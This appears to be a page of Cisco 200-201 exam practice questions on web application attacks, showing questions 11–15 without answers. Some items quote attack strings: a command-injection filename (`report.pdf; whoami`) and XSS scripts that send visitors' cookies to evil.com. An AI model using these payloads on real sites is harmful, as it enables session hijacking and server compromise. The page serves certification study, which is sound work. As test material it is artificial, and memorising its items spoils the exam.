Examers.io
ExamsOrganizationsHow it worksPricingHelp & FAQ
Cisco logo

CiscoCertified CyberOps Associate

Domain 2Objective 6

2.6 Describe Web Application Attacks, Such as SQL Injection, Command Injections, and Cross-Site Scripting 200-201 Practice Questions (Page 3)

Part of the 2.0 Security Monitoring domain, which accounts for 25% of the 200-201 exam. Cisco does not publish an official question count, but from its 120-minute exam (~50–80 total, ~13–20 in this domain), expect 1–2 from this objective — we provide 29 practice questions to prepare you well beyond it. (estimate)

29questions here
6free pages
3concepts
25%of the exam

Questions 11–15

  1. 11application · medium

    A web application has a feature that allows users to generate a PDF report by passing a filename to a server-side script. A security analyst discovers that submitting `report.pdf; whoami` causes the server to return the username of the web server process. Which attack is this?

    Select an answer first
  2. 12expert · hard

    A security analyst is reviewing a web application that has multiple vulnerabilities. The application has a login form that is vulnerable to SQL injection, a search feature that is vulnerable to reflected XSS, and a file upload feature that is vulnerable to command injection. The analyst has limited time and resources to fix the vulnerabilities. The application is internet-facing and handles sensitive customer data. Which vulnerability should be fixed first?

    Select an answer first
  3. 13expert · hard

    A security analyst is investigating a series of alerts. The web application has a search feature that reflects user input in the page, a comment feature that stores user input, and a diagnostic page that passes user input to a shell command. The analyst finds that the application does not validate or encode any user input. Which of the following is the most likely sequence of attacks that an attacker could use to achieve persistent access to the server?

    Select an answer first
  4. 14expert · hard

    A security analyst is investigating a web application that has been compromised. The analyst finds the following evidence: (1) A user comment containing `<script>document.location='https://evil.com?c='+document.cookie</script>` was posted and is displayed to all visitors. (2) The application also has a search feature that reflects user input without encoding. (3) The application uses a database that is vulnerable to SQL injection. The analyst needs to prioritize the most critical vulnerability that allows an attacker to steal session cookies of all visitors. Which vulnerability should be addressed first?

    Select an answer first
  5. 15application · medium

    A security analyst is triaging alerts from a web application. The application has a search feature that reflects the user's query in the page title. An attacker sends a link to a victim: `https://example.com/search?q=<script>fetch('https://evil.com?c='+document.cookie)</script>`. The victim clicks the link and the script executes. Which attack is this, and what is the most effective mitigation?

    Select an answer first
Finished these 5 questions?

Review the revealed explanations, or continue through the curriculum.

Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by Cisco. “200-201” is a trademark of its owner, used for identification only.